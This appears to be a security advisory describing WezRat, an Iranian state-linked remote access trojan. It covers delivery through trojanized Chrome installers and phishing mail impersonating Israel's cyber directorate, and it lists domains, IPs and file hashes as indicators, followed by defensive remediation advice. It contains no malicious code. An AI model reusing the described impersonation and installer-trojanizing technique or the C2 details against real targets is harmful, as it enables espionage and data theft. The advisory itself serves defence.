September 10, 2025
Proactive Defense: The Importance of Incident Response Planning in Cybersecurity
Multiple Adobe Products Vulnerabilities
November 18, 2024Vietnamese Threat Group Launches New PXA Stealer to Target Asia and Europe – Active IOCs
November 18, 2024Multiple Adobe Products Vulnerabilities
November 18, 2024Vietnamese Threat Group Launches New PXA Stealer to Target Asia and Europe – Active IOCs
November 18, 2024
Severity
High
Analysis Summary
A novel remote access trojan and information stealer that Iranian state-sponsored attackers employ to survey compromised endpoints and carry out malicious commands has been made public by cybersecurity experts.
The malware has been identified in the wild since at least September 1, 2023, according to artifacts published to the VirusTotal database, and the researchers have dubbed it WezRat. WezRat is capable of keylogging, uploading data, taking screenshots, executing commands, and stealing cookie files and clipboard contents. The primary component of the backdoor is less suspicious because some tasks are carried out by distinct modules that are downloaded as DLL files from the command-and-control (C2) server.
Cotton Sandstorm, an Iranian threat group best known by the cover names Emennet Pasargad and, more recently, Aria Sepehr Ayandehsazan (ASA), is thought to be the creator of WezRat. U.S. cybersecurity officials initially reported the malware late last month, characterizing it as an exploitation tool for obtaining endpoint information and executing remote commands.
According to government officials, trojanized Google Chrome installers ("Google Chrome Installer.msi") are used in attack chains. These installers not only install the genuine Chrome web browser but are also set up to run a second program called "Updater.exe" (also known internally as "bd.exe"). For its part, the malware-laced executable is made to collect system data and connect to a C2 server ("connect.il-cert[.]net") in order to wait for more commands.
WezRat has been sent to several Israeli businesses in phishing emails that seem to be from the Israeli National Cyber Directorate (INCD). The October 21, 2024, emails, which came from the email address "alert@il-cert[.]net," told recipients to apply a Chrome security update immediately. Two parameters are utilized to execute the backdoor: connect.il-cert.net 8765, which is the C2 server, and a number that serves as a 'password' to allow the backdoor to be executed correctly. According to researchers, entering the wrong password may result in the malware executing incorrectly or maybe crashing.
The malware can add a second C2 server as a backup mechanism, upload and download files, take screenshots, record keystrokes, extract clipboard content, steal cookies from Chromium-based browsers, and run commands using cmd.exe thanks to the supported commands, which are carried out as additional DLL files downloaded from the server. Earlier iterations of WezRat did not require the 'password' input to function; instead, the C2 server addresses were hard-coded. At first, WezRat operated more like a straightforward remote access trojan with simple commands. Other functions, such as the ability to take screenshots and a keylogger, were added over time and managed as distinct commands.
Additionally, the researchers’ examination of the malware and its backend architecture indicates that WezRat's creation and operations are the work of at least two distinct teams. WezRat's continuous improvement and development show a commitment to preserving a flexible and covert cyber espionage tool. Emennet Pasargad's attacks target a number of organizations in the US, Europe, and the Middle East, endangering not only direct political opponents but also any organization or person that has sway over Iran's foreign or internal narrative.
Impact
- Sensitive Data Theft
- Unauthorized Access
- Command Execution
- Cyber Espionage
Indicators of Compromise
Domain Name
- il-cert.net
- connect.il-cert.net
- onlinelive.info
IP
- 45.143.167.87
- 194.11.226.9
- 45.120.177.8
- 194.4.49.175
- 46.249.58.136
MD5
- 6b0d7b2e422a93e81ceed3645d36dd40
- edb463f094fa29bac418ec11d6d841fb
- 30ba2d89a9872dc0569897fbbab57335
- 38fa7a0b850834269dee74e90d91497b
- d1820d93322351f5684c4f75b68f738f
- e00ba872914f21a60f92560d0bbe0ab5
- 3902dc396b9e59c7eb1405a95402275d
- f6f7a2f76f6f011ad4907dee787e066e
- f797d71ed07d6e05556300e4ce0f2927
- 4459cefbe0e9bce2758ee3fcae9393c5
- a5e43f7e97cb14115dd29c136d0896a3
- b84348875fb19ff563d078206aa71a7f
- 8fdc7592f6ac675ae2289c4c72b313ff
- 12d949569325814e0405d5475f2162bf
SHA-256
- 66b08e55d11f49493118e8a6cab1bb5f1953b2a4784a38c64cf7ed02bf781713
- 53055662aeca79a319c8c59194f25bae1b33eab1a39cf18e8daa3602fbca900e
- b96fad26fba197302fd11e1771e996387b7b23c2560e08f20c69069e173c7fa7
- 2cf3cd8b7df4e87ac17812511510a48be4a9546fed513b9204c7173364db7ae3
- cf12b2043a05729839a29ff4bd23b4088888da1153ca81040a6c048417254a36
- 26f66196c463e6ec1f224d9f87c1f75d868c94bba5c8502b6cbe806e06614377
- e37b95bb9bee64cc0313eaad8a0269493745f89413bd78b58bb3b479b36084ae
- 84366a894120d4a8c83411925ef04de52fa56da6fad0023a71f71a9bf21259ad
- 4431b2a4d7758907f81fb1a0c1e36b2ce03e08d43123b1c398487770afd20727
- e1a5696dcae33657fd0aa2d1e7a36b84c4647975dab3063ac2f42c19dae0a5a1
- 5c03ac7128fb6e8ad923897e3696e08c943f4c819e5c1bdbe3df2b5774692d3d
- 898595a6646b94f9735442ae65deb5f5364eddf2a7008f66e9d7ee8b6c08c285
- 629dc03888412ae39d50cc17d5cbe579f2a99be03e6af2f071e68b7226f891d0
- 48a97f6aee23543909fc1b7341dff8aa0f1caba229d61d3b0de4e03df02b1ac0
SHA1
- 5e41ca825daa3edd7115b54b128480a6d6b8638a
- ddd5f1afcd2a35155b3f166718e34e422d2b04ab
- 1445197c862605e899cfbf95f2d94db9da5ce03b
- b7a16c4d9ac5cee9895280c6aa9832ad1ecba498
- 102cd3fceae6443beeabfb46315dca57f8ec01cf
- b2c330c787da2cf6bf24163aec54603b9e228dbd
- 306ca5a632f292e3f4db0992ac4c113c64940ea7
- ab5938fa79fe4e8b131f1f0a4bcfa9d3605d35bf
- cdc6d339d60cba856ac45cde3803f3dcba1a2c68
- 759410b78f8a6af4e7d518553732069f03a87900
- 1c0e304b80b8eb4170ae6a01e5606b4422368016
- 38ca7569334314d62a8f79cfe7fa777a605fa80e
- e7d09e5c13506551d6d760de4f5a44318b994146
- 65463784d384199cf463cc678a44563c1141bc36
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Disseminate information regarding the tactics, techniques, and procedures (TTPs) used by the threat group to target dissidents.
- Educate potential targets on the risks associated with engaging in online conversations with unknown individuals, especially on social media platforms.
- Encourage individuals to use secure communication tools and platforms that offer end-to-end encryption to protect sensitive information.
- Conduct phishing awareness training to help them recognize and avoid social engineering attacks, such as deceptive messages and links.
- Advise users to enable MFA on their accounts to add an extra layer of protection against unauthorized access.
- Ensure that all devices and software used are up to date with the latest security patches to mitigate vulnerabilities.
- Train individuals to be cautious when interacting with unknown individuals online and to be vigilant about unusual or suspicious requests.
- Implement network monitoring and intrusion detection systems to detect any unauthorized access attempts or unusual activities.
- Recommend the use of secure messaging and communication platforms that offer end-to-end encryption and protect conversations from interception.